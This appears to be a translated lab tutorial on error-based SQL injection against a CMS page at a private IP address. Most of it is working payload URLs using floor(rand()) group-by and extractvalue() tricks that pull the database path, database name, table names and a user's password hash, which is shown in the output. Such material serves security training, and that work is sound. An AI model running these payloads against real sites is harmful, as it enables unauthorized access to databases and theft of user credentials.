[SQL injection] error injection

1、 Error injection principle

Mainly through the input box , With limited controllable parameters , Construct specified error , Let it display error messages on the front page , You can get the final information

When we use SQL At the time of Injection , If you use and 1=1 No echo information , Then enter the wrong information , When there is a report of error , You can use error injection

In the process of judging the injection point , In the database SQL Error message of the statement , Will be displayed on the page , Therefore, the error information can be used to inject .

2、 Find the path of the database

 http://192.168.79.147/cms/show.php
 ?id=-33 and (select 1 from (select count(*),concat(0x5e,(select @@datadir),0x5e,floor(rand()*2))x from information_schema.tables group by x)a)

3、 Query the database name used by the current web page

 http://192.168.79.147/cms/show.php
 ?id=33 and extractvalue(1,concat(0x5e,(select database()),0x5e))

4、 Query all the table names of the database

 http://192.168.79.147/cms/show.php
 ?id=33 and extractvalue(1,concat(0x5e,(select table_name from information_schema.tables where table_schema='cms' limit 7,1),0x5e))
 ​
 #limit  The query starts from the seventh , Query a 

5、 Query the password of the database table

Query one column at a time , Only characters of the specified length can be queried

 http://192.168.79.147/cms/show.php
 ?id=33 and extractvalue(1,concat(0x5e,(select substr(password,17,32) from cms_users limit 0,1),0x5e))

e10adc3949ba59abbe56e057f20f883e